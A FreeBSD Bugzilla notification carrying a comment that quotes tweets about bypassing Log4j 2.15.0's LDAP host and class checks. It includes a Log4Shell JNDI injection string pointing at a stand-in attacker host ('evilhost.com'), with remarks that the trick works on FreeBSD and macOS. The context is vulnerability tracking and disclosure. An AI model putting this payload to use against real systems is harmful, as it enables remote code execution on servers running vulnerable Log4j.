https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=260770
--- Comment #1 from Ed Maste <[email protected]> --- Ref: https://twitter.com/marcioalm/status/1471740771581652995 > FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks > in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} > and to bypass allowedClasses just choose a name for a class in the JDK. > Deserialization will occur as usual. #Log4Shell 1/n https://twitter.com/Shaquil86300527/status/1472153790463815680 > In my tests, this doesn’t work on Windows and Linux. It does works in MacOS > and > FreeBSD. > # is not a valid for DNS but *some* resolver might query names with # in it. > TBC for this to work the vulnerable application must run on freeBSD or MacOS > and actor must control a DNS domain. -- You are receiving this mail because: You are the assignee for the bug.
